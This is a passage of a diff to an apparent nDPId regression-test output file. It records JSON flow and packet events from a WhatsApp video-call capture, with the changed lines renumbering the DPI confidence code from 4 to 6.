02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQPewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaxMYAAEARfZvAqAIMHw1WMNG4DZYAhm0oAAMAaiESpEIMCJFuDJOtHXjqlExAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACax74AAEAReqPAqAIMHw1WMNG4DZYAhm0nAAMAaiESpEIMCJFuDJOtHXjqlE1AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaIVsAAEARBNTAqAIMuTzYM9G4DZYAhlDzAAMAaiESpEIMCJFuDJOtHXjqlE5AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACa3V0AAEARSNHAqAIMuTzYM9G4DZYAhlDyAAMAaiESpEIMCJFuDJOtHXjqlE9AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaO9gAAEARHKbAqAIMnfDBMNG4DZYAhoNAAAMAaiESpEIMCJFuDJOtHXjqlFBAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaLgUAAEARKnnAqAIMnfDBMNG4DZYAhoM\/AAMAaiESpEIMCJFuDJOtHXjqlFFAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACab00AAEAR1OTAqAIMszzAMNG4DZYAhm7yAAMAaiESpEIMCJFuDJOtHXjqlFJAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaCwQAAEAROS7AqAIMszzAMNG4DZYAhm7xAAMAaiESpEIMCJFuDJOtHXjqlFNAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455769791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaNcQAAEARH6zAqAIMnfDEPtG4DZYAhoAuAAMAaiESpEIMCJFuDJOtHXjqlFRAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455769791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaC9gAAEARSZjAqAIMnfDEPtG4DZYAhoAtAAMAaiESpEIMCJFuDJOtHXjqlFVAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455769802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769802,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/k4AAFQRMGUfDVYwwKgCDA2W0bgANE7GAQMAGCESpEIMCJFuDJOtHXjqlEwAIAAIAAHuJHGmBnJAAgAIAAABa44EONE="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455769812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769812,"pkt":"kLkxKPrKxiwDYGpkCABFAABI3v0AAFMRY8Sd8MQ+wKgCDA2W0bgANGHGAQMAGCESpEIMCJFuDJOtHXjqlFQAIAAIAAHuJHGmBnJAAgAIAAABa44EONc="} @@ -34,51 +34,51 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455769823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769823,"pkt":"kLkxKPrKxiwDYGpkCABFAABIblcAAFAR2nid8MEwwKgCDA2W0bgANGTSAQMAGCESpEIMCJFuDJOtHXjqlFAAIAAIAAHuJHGmBnJAAgAIAAABa44EON0="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455770313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455770313,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClcA8AAAIRlYrAqAIM7\/\/\/+shNB2wAkeqFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 